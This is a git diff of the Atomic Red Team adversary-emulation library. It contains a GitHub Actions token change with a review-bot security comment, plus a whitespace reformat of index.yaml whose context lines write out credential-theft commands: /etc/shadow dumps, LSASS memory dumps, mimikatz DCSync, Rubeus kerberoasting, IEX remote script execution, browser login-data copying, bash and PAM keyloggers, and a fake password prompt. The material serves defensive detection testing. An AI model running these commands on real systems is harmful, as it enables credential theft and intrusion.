diff --git a/.github/workflows/generate-docs.yml b/.github/workflows/generate-docs.yml
index 66bc2998..64798f65 100644
--- a/.github/workflows/generate-docs.yml
+++ b/.github/workflows/generate-docs.yml
@@ -9,6 +9,9 @@ jobs:
steps:
- name: checkout repo
uses: actions/checkout@v2
+ with:
+ token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
+ ref: 'master'
- name: setup ruby
uses: ruby/setup-ruby@v1
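Review bot: The `token:` added to the checkout step is a PAT that can push past protection on `master`, and actions/checkout persists it into the repo's `.git/config` by default, so every later step in this job (setup-ruby and whatever generates the docs) runs with read access to that credential rather than only the step that needs to push. If the generation steps run any code from the checked-out tree or installed gems, a compromised dependency could exfiltrate it; consider adding `persist-credentials: false` under `with:` and passing `${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}` only to the final push step (for example via `git push https://x-access-token:${TOKEN}@github.com/...` with the token as a step-level `env`). The same `with:` block pins `ref: 'master'`, which is sensible if this workflow can be triggered from forks, but the `on:` triggers are outside this hunk so that cannot be confirmed here. Separately, `actions/checkout@v2` and `ruby/setup-ruby@v1` are mutable tags; since this job now holds a privileged token, pinning both to a full commit SHA (e.g. `uses: actions/checkout@<sha> # v2`) would keep a tag move from silently changing what runs with it.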
diff --git a/README.md b/README.md
index ef8c005a..c6043789 100644
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
# Atomic Red Team
-[](https://circleci.com/gh/redcanaryco/atomic-red-team)
+
Atomic Red Team™ is library of tests mapped to the
[MITRE ATT&CK®](https://attack.mitre.org/) framework. Security teams can use
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index a29bf92f..e6cba7ed 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -61,7 +61,7 @@ credential-access:
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: bash
elevation_required: true
- name: Access /etc/passwd (Local)
@@ -80,13 +80,13 @@ credential-access:
cat #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: sh
- name: Access /etc/{shadow,passwd} with a standard bin that's not cat
auto_generated_guid: df1a55ae-019d-4120-bc35-94f4bc5c4b0a
description: 'Dump /etc/passwd and /etc/shadow using ed
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -97,17 +97,17 @@ credential-access:
executor:
command: 'echo -e "e /etc/passwd\n,p\ne /etc/shadow\n,p\n" | ed > #{output_file}
-'
+ '
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: bash
elevation_required: true
- name: Access /etc/{shadow,passwd} with shell builtins
auto_generated_guid: f5aa6543-6cb2-4fae-b9c2-b96e14721713
description: 'Dump /etc/passwd and /etc/shadow using bash builtins
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -122,7 +122,7 @@ credential-access:
testcat /etc/shadow > #{output_file}
cleanup_command: 'rm -f #{output_file}
-'
+ '
name: bash
elevation_required: true
T1557.002:
@@ -314,32 +314,32 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
- description: 'Rubeus must exist
-'
+ '
prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
-'
+ '
executor:
command: 'cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"
-'
+ '
cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: false
- name: Get-DomainUser with PowerView
@@ -348,7 +348,7 @@ credential-access:
Upon execution, progress and info about users within the domain being scanned
will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -457,7 +457,7 @@ credential-access:
description: 'Search through bash history for specifice commands we want to
capture
-'
+ '
supported_platforms:
- linux
- macos
@@ -479,7 +479,7 @@ credential-access:
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
#{output_file}
-'
+ '
name: sh
T1110:
technique:
@@ -608,7 +608,7 @@ credential-access:
elevation_required: false
command: 'cmdkey /list
-'
+ '
T1552.005:
technique:
object_marking_refs:
@@ -729,7 +729,7 @@ credential-access:
pod service account, for example) can access sensitive information that might
include credentials to various services.
-'
+ '
supported_platforms:
- containers
input_arguments:
@@ -740,17 +740,17 @@ credential-access:
dependencies:
- description: 'kubectl must be installed
-'
+ '
get_prereq_command: 'echo "kubectl must be installed manually"
-'
+ '
prereq_command: 'which kubectl
-'
+ '
executor:
command: 'kubectl get secrets -n #{namespace}
-'
+ '
name: bash
elevation_required: false
- name: Cat the contents of a Kubernetes service account token file
@@ -758,7 +758,7 @@ credential-access:
description: 'Access the Kubernetes service account access token stored within
a container in a cluster.
-'
+ '
supported_platforms:
- linux
dependency_executor_name: sh
@@ -766,24 +766,24 @@ credential-access:
- description: Verify docker is installed.
prereq_command: 'which docker
-'
+ '
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
echo "Docker installed"; fi
-'
+ '
- description: Verify docker service is running.
prereq_command: 'sudo systemctl status docker
-'
+ '
get_prereq_command: 'sudo systemctl start docker
-'
+ '
- description: Verify kind is in the path.
prereq_command: 'which kind
-'
+ '
get_prereq_command: |
curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
chmod +x ./kind
@@ -791,14 +791,14 @@ credential-access:
- description: Verify kind-atomic-cluster is created
prereq_command: 'sudo kind get clusters
-'
+ '
get_prereq_command: 'sudo kind create cluster --name atomic-cluster
-'
+ '
- description: Verify kubectl is in path
prereq_command: 'which kubectl
-'
+ '
get_prereq_command: |
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x ./kubectl
@@ -806,19 +806,19 @@ credential-access:
- description: Verify atomic-pod is running.
prereq_command: 'kubectl --context kind-atomic-cluster get pods |grep atomic-pod
-'
+ '
get_prereq_command: 'kubectl --context kind-atomic-cluster run atomic-pod
--image=alpine --command -- sleep infinity
-'
+ '
executor:
command: 'kubectl --context kind-atomic-cluster exec atomic-pod -- cat /run/secrets/kubernetes.io/serviceaccount/token
-'
+ '
name: sh
cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-pod
-'
+ '
T1056.004:
technique:
object_marking_refs:
@@ -920,7 +920,7 @@ credential-access:
auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33
description: 'Hooks functions in PowerShell to read TLS Communications
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -936,10 +936,10 @@ credential-access:
dependencies:
- description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name})
-'
+ '
prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing
@@ -1025,7 +1025,7 @@ credential-access:
description: 'Using username,password combination from a password dump to login
over SSH.
-'
+ '
supported_platforms:
- linux
input_arguments:
@@ -1037,16 +1037,16 @@ credential-access:
dependencies:
- description: 'Requires SSHPASS
-'
+ '
prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] ||
[ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo
apt install sshpass -y; else echo "This test requires sshpass" ; fi ;
-'
+ '
executor:
name: bash
elevation_required: false
@@ -1058,7 +1058,7 @@ credential-access:
description: 'Using username,password combination from a password dump to login
over SSH.
-'
+ '
supported_platforms:
- macos
input_arguments:
@@ -1070,11 +1070,11 @@ credential-access:
dependencies:
- description: 'Requires SSHPASS
-'
+ '
prereq_command: 'if [ -x "$(command -v sshpass)" ]; then exit 0; else exit
1; fi;
-'
+ '
get_prereq_command: |
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)"
brew install hudochenkov/sshpass/sshpass
@@ -1170,14 +1170,14 @@ credential-access:
executor:
command: 'python2 laZagne.py all
-'
+ '
elevation_required: true
name: bash
- name: Extract passwords with grep
auto_generated_guid: bd4cf0d1-7646-474e-8610-78ccf5a097c4
description: 'Extracting credentials from files
-'
+ '
supported_platforms:
- macos
- linux
@@ -1189,14 +1189,14 @@ credential-access:
executor:
command: 'grep -ri password #{file_path}
-'
+ '
name: sh
- name: Extracting passwords with findstr
auto_generated_guid: 0e56bf29-ff49-4ea5-9af4-3b81283fd513
description: 'Extracting Credentials from Files. Upon execution, the contents
of files that contain the word "password" will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -1222,7 +1222,7 @@ credential-access:
description: 'This test looks for .netrc files (which stores github credentials
in clear text )and dumps its contents if found.
-'
+ '
supported_platforms:
- macos
- linux
@@ -1286,7 +1286,7 @@ credential-access:
dependencies:
- description: 'Microsoft Word must be installed
-'
+ '
prereq_command: |
try {
New-Object -COMObject "word.Application" | Out-Null
@@ -1297,7 +1297,7 @@ credential-access:
get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
to meet this requirement"
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -1306,7 +1306,7 @@ credential-access:
cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction
Ignore
-'
+ '
name: powershell
- name: Dump credentials from Windows Credential Manager With PowerShell [windows
Credentials]
@@ -1333,7 +1333,7 @@ credential-access:
command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
-UseBasicParsing); Get-CredManCreds -Force
-'
+ '
- name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe
[Windows Credentials]
auto_generated_guid: 36753ded-e5c4-4eb5-bc3c-e8fba236878d
@@ -1346,7 +1346,7 @@ credential-access:
elevation_required: false
command: 'vaultcmd /listcreds:"Windows Credentials" /all
-'
+ '
- name: Enumerate credentials from Windows Credential Manager using vaultcmd.exe
[Web Credentials]
auto_generated_guid: bc071188-459f-44d5-901a-f8f2625b2d2e
@@ -1359,7 +1359,7 @@ credential-access:
elevation_required: false
command: 'vaultcmd /listcreds:"Web Credentials" /all
-'
+ '
T1555.003:
technique:
object_marking_refs:
@@ -1471,11 +1471,11 @@ credential-access:
dependencies:
- description: 'Modified Sysinternals must be located at #{file_path}
-'
+ '
prereq_command: 'if (Test-Path #{file_path}\SysInternals) {exit 0} else {exit
1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://github.com/mitre-attack/attack-arsenal/raw/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/Modified-SysInternalsSuite.zip" -OutFile "#{file_path}\Modified-SysInternalsSuite.zip"
@@ -1488,7 +1488,7 @@ credential-access:
cleanup_command: 'Remove-Item #{file_path}\Sysinternals -Force -Recurse -ErrorAction
Ignore
-'
+ '
name: powershell
- name: Search macOS Safari Cookies
auto_generated_guid: c1402f7b-67ca-43a8-b5f3-3143abedc01b
@@ -1525,10 +1525,10 @@ credential-access:
dependencies:
- description: 'LaZagne.exe must exist on disk at specified location (#{lazagne_path})
-'
+ '
prereq_command: 'if (Test-Path #{lazagne_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{lazagne_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe" -OutFile "#{lazagne_path}"
@@ -1546,7 +1546,7 @@ credential-access:
dependencies:
- description: 'Chrome must be installed
-'
+ '
prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe")
-Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"))
{exit 0} else {exit 1}
@@ -1574,7 +1574,7 @@ credential-access:
dependencies:
- description: 'Opera must be installed
-'
+ '
prereq_command: if (((Test-Path "$env:LOCALAPPDATA\Programs\Opera\launcher.exe")
-Or (Test-Path "C:\Program Files\Opera\launcher.exe") -Or (Test-Path "C:\Program
Files (x86)\Opera\launcher.exe"))) {exit 0} else {exit 1}
@@ -1586,23 +1586,23 @@ credential-access:
Stop-Process -Name "opera"
- description: 'Opera login data file must exist
-'
+ '
prereq_command: if (Test-Path "$env:APPDATA\Opera Software\Opera Stable\Login
Data") {exit 0} else {exit 1}
get_prereq_command: 'New-Item -Path "$env:APPDATA\Opera Software\Opera Stable\Login
Data" -ItemType File
-'
+ '
executor:
name: powershell
command: 'Copy-Item "$env:APPDATA\Opera Software\Opera Stable\Login Data"
-Destination $env:temp
-'
+ '
cleanup_command: 'Remove-Item -Path "$env:temp\Login Data" -Force -ErrorAction
Ignore
-'
+ '
- name: Simulating access to Windows Firefox Login Data
auto_generated_guid: eb8da98a-2e16-4551-b3dd-83de49baa14c
description: |
@@ -1614,7 +1614,7 @@ credential-access:
dependencies:
- description: 'Firefox must be installed
-'
+ '
prereq_command: if ((Test-Path "C:\Program Files\Mozilla Firefox\firefox.exe")
-Or (Test-Path "C:\Program Files (x86)\Mozilla Firefox\firefox.exe")) {exit
0} else {exit 1}
@@ -1625,7 +1625,7 @@ credential-access:
Start-Process $installer -ArgumentList '/S' -Wait
- description: 'Firefox login data file must exist
-'
+ '
prereq_command: if (Test-Path "$env:APPDATA\Mozilla\Firefox\Profiles\") {exit
0} else {exit 1}
get_prereq_command: |
@@ -1639,11 +1639,11 @@ credential-access:
command: 'Copy-Item "$env:APPDATA\Mozilla\Firefox\Profiles\" -Destination
$env:temp -Force -Recurse
-'
+ '
cleanup_command: 'Remove-Item -Path "$env:temp\Profiles" -Force -ErrorAction
Ignore -Recurse
-'
+ '
- name: Simulating access to Windows Edge Login Data
auto_generated_guid: a6a5ec26-a2d1-4109-9d35-58b867689329
description: |
@@ -1655,16 +1655,16 @@ credential-access:
dependencies:
- description: 'Edge must be installed
-'
+ '
prereq_command: if (Test-Path "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe")
{exit 0} else {exit 1}
get_prereq_command: '"Installation is not implemented as Edge is a part of
windows"
-'
+ '
- description: 'Edge login data file must exist
-'
+ '
prereq_command: if (Test-Path "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default")
{exit 0} else {exit 1}
get_prereq_command: "$edge=\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\"\nStart-Process
@@ -1674,11 +1674,11 @@ credential-access:
command: 'Copy-Item "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default" -Destination
$env:temp\Edge -Force -Recurse
-'
+ '
cleanup_command: 'Remove-Item -Path "$env:temp\Edge" -Force -ErrorAction Ignore
-Recurse
-'
+ '
- name: Decrypt Mozilla Passwords with Firepwd.py
auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381
description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird,
@@ -1703,15 +1703,15 @@ credential-access:
dependencies:
- description: 'Firepwd must exist at #{Firepwd_Path}
-'
+ '
prereq_command: if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py"
-outfile "#{Firepwd_Path}"
-'
+ '
- description: 'Firefox profile directory must be present
-'
+ '
prereq_command: if (get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-erroraction silentlycontinue) {exit 0} else {exit 1}
get_prereq_command: |
@@ -1723,14 +1723,14 @@ credential-access:
stop-process -name "firefox"
- description: 'Visual Studio Build Tools command prompt must exist at #{VS_CMD_Path}
-'
+ '
prereq_command: if (Test-Path "#{VS_CMD_Path}") {exit 0} else {exit 1}
get_prereq_command: |
invoke-webrequest "https://aka.ms/vs/17/release/vs_BuildTools.exe" -outfile "$env:temp\VS_BuildTools.exe"
write-host "Visual Studio Build Tools (Desktop Development with C++) must be installed manually. Please run the installer from $env:temp\VS_BuildTools.exe."
- description: 'Pip must be installed.
-'
+ '
prereq_command: if (pip -v) {exit 0} else {exit 1}
get_prereq_command: "invoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-outfile \"$env:temp\\ez_setup.py\" \ninvoke-webrequest \"https://bootstrap.pypa.io/get-pip.py\"
@@ -1743,7 +1743,7 @@ credential-access:
"Visual Studio Build Tools (C++ Support) must be installed to continue gathering
this prereq"}
-'
+ '
- description: "Pyasn1 library must be installed \n"
prereq_command: if (pip show pyasn1) {exit 0} else {exit 1}
get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){pip install pyasn1 |
@@ -1751,7 +1751,7 @@ credential-access:
"Visual Studio Build Tools (C++ Support) must be installed to continue gathering
this prereq."}
-'
+ '
executor:
name: powershell
command: |
@@ -1817,7 +1817,7 @@ credential-access:
description: 'Queries to enumerate for credentials in the Registry. Upon execution,
any registry key containing the word "password" will be displayed.
-'
+ '
supported_platforms:
- windows
executor:
@@ -1835,7 +1835,7 @@ credential-access:
executor:
command: 'reg query HKCU\Software\SimonTatham\PuTTY\Sessions /t REG_SZ /s
-'
+ '
name: command_prompt
T1003.006:
technique:
@@ -1952,7 +1952,7 @@ credential-access:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -1969,7 +1969,7 @@ credential-access:
command: '#{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}"
"exit"
-'
+ '
- name: Run DSInternals Get-ADReplAccount
auto_generated_guid: a0bced08-3fc5-4d8b-93b7-e8344739376e
description: "The following Atomic will run Get-ADReplAccount from DSInternals.\nUpon
@@ -1986,18 +1986,18 @@ credential-access:
dependencies:
- description: 'DSInternals must be installed
-'
+ '
prereq_command: |
$RequiredModule = Get-Module -Name DSInternals -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['DSInternals']) {exit 1} else {exit 0}
get_prereq_command: 'Install-Module -Name DSInternals -Scope CurrentUser -Force
-'
+ '
executor:
command: 'Get-ADReplAccount -All -Server #{logonserver}
-'
+ '
name: powershell
elevation_required: false
T1556.001:
@@ -2206,7 +2206,7 @@ credential-access:
description: 'This module runs the Windows executable of PetitPotam in order
to coerce authentication for a remote system.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -2235,11 +2235,11 @@ credential-access:
prereq_command: 'if (Test-Path "#{petitpotam_path}") { exit 0 } else { exit
1 }
-'
+ '
get_prereq_command: 'Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true"
-OutFile "#{petitpotam_path}"
-'
+ '
executor:
name: powershell
elevation_required: false
@@ -2404,7 +2404,7 @@ credential-access:
to apply changes." & return & return default answer "" with icon 1 with
hidden answer with title "Software Update"''
-'
+ '
name: bash
- name: PowerShell - Prompt User for Password
auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
@@ -2535,7 +2535,7 @@ credential-access:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -2613,25 +2613,25 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
- description: 'Rubeus must exist
-'
+ '
prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
-'
+ '
executor:
name: powershell
elevation_required: false
@@ -2725,26 +2725,26 @@ credential-access:
files on the Domain Controller. This value can be decrypted with gpp-decrypt
on Kali Linux.
-'
+ '
supported_platforms:
- windows
dependency_executor_name: powershell
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: 'findstr /S cpassword %logonserver%\sysvol\*.xml
-'
+ '
name: command_prompt
- name: GPP Passwords (Get-GPPPassword)
auto_generated_guid: e9584f82-322c-474a-b831-940fd8b4455c
@@ -2769,25 +2769,25 @@ credential-access:
dependencies:
- description: 'Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
-'
+ '
prereq_command: 'if(Test-Path "#{gpp_script_path}") {exit 0 } else {exit 1
}
-'
+ '
get_prereq_command: |
New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: |
. #{gpp_script_path}
@@ -2960,15 +2960,15 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -3008,32 +3008,32 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
- description: 'Rubeus must exist
-'
+ '
prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
-'
+ '
executor:
command: |
klist purge
cmd.exe /c "#{local_folder}\#{local_executable}" kerberoast #{flags} /outfile:"#{local_folder}\#{out_file}"
cleanup_command: 'Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: false
- name: Extract all accounts in use as SPN using setspn
@@ -3053,19 +3053,19 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: 'setspn -T #{domain_name} -Q */*
-'
+ '
name: command_prompt
- name: Request A Single Ticket via PowerShell
auto_generated_guid: 988539bc-2ed7-4e62-aec6-7c5cf6680863
@@ -3079,15 +3079,15 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: "Add-Type -AssemblyName System.IdentityModel\n$ComputerFQDN=$env:LogonServer.trimStart('\\')
+ \".\" + $env:UserDnsDomain\nNew-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken
@@ -3110,15 +3110,15 @@ credential-access:
dependencies:
- description: 'Computer must be domain joined
-'
+ '
prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain)
{exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Joining this computer to a domain must be
done manually
-'
+ '
executor:
command: "Add-Type -AssemblyName System.IdentityModel \nsetspn.exe -T #{domain_name}
-Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken
@@ -3287,7 +3287,7 @@ credential-access:
.\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath}
cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Living off the land Terminal Input Capture on Linux with pam.d
@@ -3306,14 +3306,14 @@ credential-access:
dependencies:
- description: 'Checking if pam_tty_audit.so is installed
-'
+ '
prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so''
-'
+ '
get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so
and recompile, for this test to work"
-'
+ '
supported_platforms:
- linux
executor:
@@ -3344,14 +3344,14 @@ credential-access:
- description: 'This test requires to be run in a bash shell and that logger
and tee are installed.
-'
+ '
prereq_command: |
if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi
if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -3361,7 +3361,7 @@ credential-access:
tail /var/log/syslog
cleanup_command: 'unset PROMPT_COMMAND
-'
+ '
- name: Bash session based keylogger
auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258
description: "When a command is executed in bash, the BASH_COMMAND variable
@@ -3378,14 +3378,14 @@ credential-access:
dependencies:
- description: 'This test requires to be run in a bash shell
-'
+ '
prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n*****
Bash not running! *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
input_arguments:
output_file:
name: output_file
@@ -3401,7 +3401,7 @@ credential-access:
cat #{output_file}
cleanup_command: 'rm #{output_file}
-'
+ '
- name: SSHD PAM keylogger
auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca
description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication.
@@ -3409,20 +3409,20 @@ credential-access:
of TTY input and capture all keystrokes in a ssh session and place them in
the /var/log/audit/audit.log file after the session closes.
-'
+ '
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'This test requires sshd and auditd
-'
+ '
prereq_command: |
if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi
if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi
get_prereq_command: 'echo ""
-'
+ '
input_arguments:
user_account:
description: Basic ssh user account for testing.
@@ -3436,7 +3436,7 @@ credential-access:
restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n"
cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/
-'
+ '
- name: Auditd keylogger
auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af
description: "The linux audit tool auditd can be used to capture 32 and 64 bit
@@ -3448,14 +3448,14 @@ credential-access:
dependencies:
- description: 'This test requires sshd and auditd
-'
+ '
prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n*****
auditd NOT installed *****\n"; exit 1; fi
-'
+ '
get_prereq_command: 'echo ""
-'
+ '
executor:
name: sh
elevation_required: true
@@ -3464,7 +3464,7 @@ credential-access:
$(date +\"%d/%m/%y %H:%M:%S\") \n"
cleanup_command: 'systemctl restart auditd
-'
+ '
T1557.001:
technique:
object_marking_refs:
@@ -3790,10 +3790,10 @@ credential-access:
- description: 'ProcDump tool from Sysinternals must exist on disk at specified
location (#{procdump_exe})
-'
+ '
prereq_command: 'if (Test-Path #{procdump_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
@@ -3804,7 +3804,7 @@ credential-access:
command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n"
cleanup_command: 'del "#{output_file}" >nul 2> nul
-'
+ '
name: command_prompt
elevation_required: true
- name: Dump LSASS.exe Memory using comsvcs.dll
@@ -3819,10 +3819,10 @@ credential-access:
command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll,
MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
-'
+ '
cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
-'
+ '
name: powershell
elevation_required: true
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
@@ -3845,10 +3845,10 @@ credential-access:
